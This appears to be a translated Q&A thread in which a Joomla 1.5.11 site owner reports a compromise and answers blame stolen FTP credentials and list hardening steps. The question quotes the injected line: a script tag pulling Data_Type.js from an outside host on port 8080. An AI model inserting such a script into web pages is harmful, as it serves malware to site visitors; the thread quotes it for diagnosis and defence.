最近我的网站遭到了恶意软件的攻击。它将我的主页变为空白。该攻击在我的 index.php 中添加了 2 行:
<script type="text/javascript" src="http://kollinsoy.skyefenton.com:8080/Data_Type.js"></script>
<!--6aa6b5f1b4e70b5a72df7793c2b6e64b-->
我正在使用 joomla 1.5.11 和这种被认为是安全的服务器。这种情况是如何发生的以及如何防止将来再次发生。
答案1
这是利用被盗 FTP 凭证进行的常见攻击。因此,即使您的 Joomla 安装是安全的,您也需要使用好的密码。
现在要做的第一件事就是尽快更改您的密码。
该恶意软件的详细信息:
http://blog.sucuri.net/2010/06/web-sites-hacked-with-malware-from-iopap-upperdarby26-com.html
答案2
1)最新更新。
2)运行IDS,并保留不应该改变的文件的校验和。
3)考虑建立一个系统来对不应该改变的文件进行版本控制。
4)不要运行不必要的软件。
5)尽可能隔离进程和服务,并以尽可能低的权限运行。
6)订阅您使用的软件的安全和用户邮件列表,例如 Joomla 组和您在服务器上使用的软件。
7)备份 备份 备份
8) 从已知良好的来源格式化并重新安装您的服务器。您不知道入侵可以追溯到多久以前,也不知道引入了哪些 rootkit 或其他问题。
9)在交换机、路由器、防火墙的系统上安装监控软件……从异常中了解“正常”的流量模式,然后在出现异常时进行调查。
10) 熟悉贵公司的服务器和工作流程。足够熟悉,当服务器出现问题时,您可以“感觉”到。调查。检查日志。
11) 配置远程日志记录到安全服务器。当日志在本地时,受感染的系统很容易掩盖其踪迹。
12)阅读一些有关系统安全的书籍或委托某人负责更新、安全问题等。
13) 将面向互联网的系统与内部开发、备份等系统隔离。如果您的内部系统受到记录器和嗅探器的监控,备份就毫无用处。
14)继续阅读书籍和在线文章来研究服务器安全性,因为如果您想在这样的主题上保护您的企业(和您的客户),这个网站不可能涵盖您应该知道的所有内容。
答案3
这种漏洞通常是通过泄露的 ftp 用户名/密码进行的